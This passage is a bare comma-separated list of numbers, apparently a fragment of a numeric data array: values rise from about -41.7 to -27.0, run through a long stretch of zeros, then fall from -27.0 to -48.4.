,-41.7,-41.7,-41.6,-41.5,-41.5,-41.4,-41.4,-41.3,-41.2,-41.2,-41.1,-41.1,-41.0,-40.9,-40.9,-40.8,-40.8,-40.7,-40.6,-40.6,-40.5,-40.5,-40.4,-40.3,-40.3,-40.2,-40.2,-40.1,-40.0,-40.0,-39.9,-39.9,-39.8,-39.7,-39.7,-39.6,-39.6,-39.5,-39.4,-39.4,-39.3,-39.3,-39.2,-39.1,-39.1,-39.0,-39.0,-38.9,-38.8,-38.8,-38.7,-38.7,-38.6,-38.5,-38.5,-38.4,-38.4,-38.3,-38.2,-38.2,-38.1,-38.1,-38.0,-37.9,-37.9,-37.8,-37.8,-37.7,-37.6,-37.6,-37.5,-37.5,-37.4,-37.3,-37.3,-37.2,-37.2,-37.1,-37.0,-37.0,-36.9,-36.9,-36.8,-36.7,-36.7,-36.6,-36.6,-36.5,-36.4,-36.4,-36.3,-36.3,-36.2,-36.1,-36.1,-36.0,-36.0,-35.9,-35.8,-35.8,-35.7,-35.7,-35.6,-35.5,-35.5,-35.4,-35.4,-35.3,-35.2,-35.2,-35.1,-35.1,-35.0,-34.9,-34.9,-34.8,-34.8,-34.7,-34.6,-34.6,-34.5,-34.5,-34.4,-34.3,-34.3,-34.2,-34.2,-34.1,-34.0,-34.0,-33.9,-33.9,-33.8,-33.7,-33.7,-33.6,-33.6,-33.5,-33.4,-33.4,-33.3,-33.3,-33.2,-33.1,-33.1,-33.0,-33.0,-32.9,-32.8,-32.8,-32.7,-32.7,-32.6,-32.5,-32.5,-32.4,-32.3,-32.3,-32.2,-32.2,-32.1,-32.0,-32.0,-31.9,-31.9,-31.8,-31.7,-31.7,-31.6,-31.6,-31.5,-31.4,-31.4,-31.3,-31.3,-31.2,-31.1,-31.1,-31.0,-31.0,-30.9,-30.8,-30.8,-30.7,-30.7,-30.6,-30.5,-30.5,-30.4,-30.4,-30.3,-30.2,-30.2,-30.1,-30.1,-30.0,-29.9,-29.9,-29.8,-29.8,-29.7,-29.6,-29.6,-29.5,-29.5,-29.4,-29.3,-29.3,-29.2,-29.2,-29.1,-29.0,-29.0,-28.9,-28.9,-28.8,-28.7,-28.7,-28.6,-28.6,-28.5,-28.4,-28.4,-28.3,-28.3,-28.2,-28.1,-28.1,-28.0,-28.0,-27.9,-27.8,-27.8,-27.7,-27.7,-27.6,-27.5,-27.5,-27.4,-27.4,-27.3,-27.2,-27.2,-27.1,-27.1,-27.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,-27.0,-27.1,-27.1,-27.2,-27.2,-27.3,-27.4,-27.4,-27.5,-27.5,-27.6,-27.7,-27.7,-27.8,-27.8,-27.9,-28.0,-28.0,-28.1,-28.1,-28.2,-28.3,-28.3,-28.4,-28.4,-28.5,-28.6,-28.6,-28.7,-28.7,-28.8,-28.9,-28.9,-29.0,-29.0,-29.1,-29.2,-29.2,-29.3,-29.3,-29.4,-29.5,-29.5,-29.6,-29.6,-29.7,-29.8,-29.8,-29.9,-29.9,-30.0,-30.1,-30.1,-30.2,-30.2,-30.3,-30.4,-30.4,-30.5,-30.5,-30.6,-30.7,-30.7,-30.8,-30.8,-30.9,-31.0,-31.0,-31.1,-31.1,-31.2,-31.3,-31.3,-31.4,-31.4,-31.5,-31.6,-31.6,-31.7,-31.7,-31.8,-31.9,-31.9,-32.0,-32.0,-32.1,-32.2,-32.2,-32.3,-32.3,-32.4,-32.5,-32.5,-32.6,-32.7,-32.7,-32.8,-32.8,-32.9,-33.0,-33.0,-33.1,-33.1,-33.2,-33.3,-33.3,-33.4,-33.4,-33.5,-33.6,-33.6,-33.7,-33.7,-33.8,-33.9,-33.9,-34.0,-34.0,-34.1,-34.2,-34.2,-34.3,-34.3,-34.4,-34.5,-34.5,-34.6,-34.6,-34.7,-34.8,-34.8,-34.9,-34.9,-35.0,-35.1,-35.1,-35.2,-35.2,-35.3,-35.4,-35.4,-35.5,-35.5,-35.6,-35.7,-35.7,-35.8,-35.8,-35.9,-36.0,-36.0,-36.1,-36.1,-36.2,-36.3,-36.3,-36.4,-36.4,-36.5,-36.6,-36.6,-36.7,-36.7,-36.8,-36.9,-36.9,-37.0,-37.0,-37.1,-37.2,-37.2,-37.3,-37.3,-37.4,-37.5,-37.5,-37.6,-37.6,-37.7,-37.8,-37.8,-37.9,-37.9,-38.0,-38.1,-38.1,-38.2,-38.2,-38.3,-38.4,-38.4,-38.5,-38.5,-38.6,-38.7,-38.7,-38.8,-38.8,-38.9,-39.0,-39.0,-39.1,-39.1,-39.2,-39.3,-39.3,-39.4,-39.4,-39.5,-39.6,-39.6,-39.7,-39.7,-39.8,-39.9,-39.9,-40.0,-40.0,-40.1,-40.2,-40.2,-40.3,-40.3,-40.4,-40.5,-40.5,-40.6,-40.6,-40.7,-40.8,-40.8,-40.9,-40.9,-41.0,-41.1,-41.1,-41.2,-41.2,-41.3,-41.4,-41.4,-41.5,-41.5,-41.6,-41.7,-41.7,-41.8,-41.8,-41.9,-42.0,-42.0,-42.1,-42.1,-42.2,-42.3,-42.3,-42.4,-42.4,-42.5,-42.6,-42.6,-42.7,-42.7,-42.8,-42.9,-42.9,-43.0,-43.0,-43.1,-43.2,-43.2,-43.3,-43.3,-43.4,-43.5,-43.5,-43.6,-43.7,-43.7,-43.8,-43.8,-43.9,-44.0,-44.0,-44.1,-44.1,-44.2,-44.3,-44.3,-44.4,-44.4,-44.5,-44.6,-44.6,-44.7,-44.7,-44.8,-44.9,-44.9,-45.0,-45.0,-45.1,-45.2,-45.2,-45.3,-45.3,-45.4,-45.5,-45.5,-45.6,-45.6,-45.7,-45.8,-45.8,-45.9,-45.9,-46.0,-46.1,-46.1,-46.2,-46.2,-46.3,-46.4,-46.4,-46.5,-46.5,-46.6,-46.7,-46.7,-46.8,-46.8,-46.9,-47.0,-47.0,-47.1,-47.1,-47.2,-47.3,-47.3,-47.4,-47.4,-47.5,-47.6,-47.6,-47.7,-47.7,-47.8,-47.9,-47.9,-48.0,-48.0,-48.1,-48.2,-48.2,-48.3,-48.3,-48.4,